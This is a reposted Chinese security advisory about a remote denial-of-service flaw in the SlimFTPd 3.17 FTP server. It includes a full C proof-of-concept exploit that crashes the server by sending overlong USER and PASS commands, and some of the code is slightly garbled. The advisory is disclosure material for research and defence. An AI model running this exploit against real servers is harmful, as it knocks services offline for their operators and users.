WhitSoft Development SlimFTPd远程拒绝服务漏洞
2008-04-09 04:14:53来源:互联网 阅读 ()
发布日期:2005-09-05
更新日期:2005-09-05
受影响系统:
WhitSoft Development SlimFTPd 3.17描述:
BUGTRAQ ID: 14723
SlimFTPd是一个小型的FTP服务器工具,完全支持多线程技术。
SlimFTPd中存在远程拒绝服务漏洞,起因是登录时没有正确的过滤user/pass命令输入。服务器在遭遇攻击后可能会导致30-60秒的崩溃。
<*来源:Critical Security (http://www.critical.lt)
链接:http://www.critical.lt/?vulnerabilities/8
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Slim FTPd 3.17 Remote DoS PoC Exploit
Public proof of concept code by "Critical Security" http://www.critical.lt
Use for education only! Don't break the law...
Original Advisory may be found here: http://www.critical.lt/?vulnerabilities/8
Exploit compiles without warnings on FreeBSD 5.4-RELEASE
Tested against Slim FTPd 3.17 on Windows XP SP 2
Compilation:
mircia$ uname -sr
FreeBSD 5.4-RELEASE-p6
mircia$ gcc this_file.c -o expl
mircia$ ./expl localhost
here goes output
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 21
#define USER "USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n" //
#define PASS "PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n" // Our dirty requests ;)
#define QUIT "QUIT" // after all we just quit
int main(int argc, char *argv[]) {
register int s;
register int bytes;
struct sockaddr_in sa;
struct hostent *he;
char buf[BUFSIZ 1];
char *host;
if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror("pizute");
return 1;
}
bzero(&sa, sizeof sa);
sa.sin_family = AF_INET;
if (argc <= 1) {
printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
} else {
host = (char *)argv[1];
sa.sin_port = htons(PORT);
if ((he = gethostbyname(host)) == NULL) {
perror(host);
return 2;
}
printf ("%s","\nCritical Security web-site: http://www.critical.lt\n");
printf ("%s","Slim FTPd 3.17 lame PoC DoS exploit.\n");
printf ("%s","greets to Lithuanian girlz :)\n\n");
printf ("%s%s%s","[*] Initiating attack against ",host, "\n");
bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);
if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
perror("connect");
return 3;
}
write(s,USER,sizeof USER); // dirty dirty dirty...
write(s,PASS,sizeof PASS);
write(s,QUIT,sizeof QUIT);
printf("%s","[*] Stuff sent, now wait for 30-120 seconds,\nserver should crash, if's not - try again or write a better code :P\n");
close(s);
return 0;
}}
建议:
厂商补丁:
WhitSoft Development
--------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.whitsoftdev.com/slimftpd/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
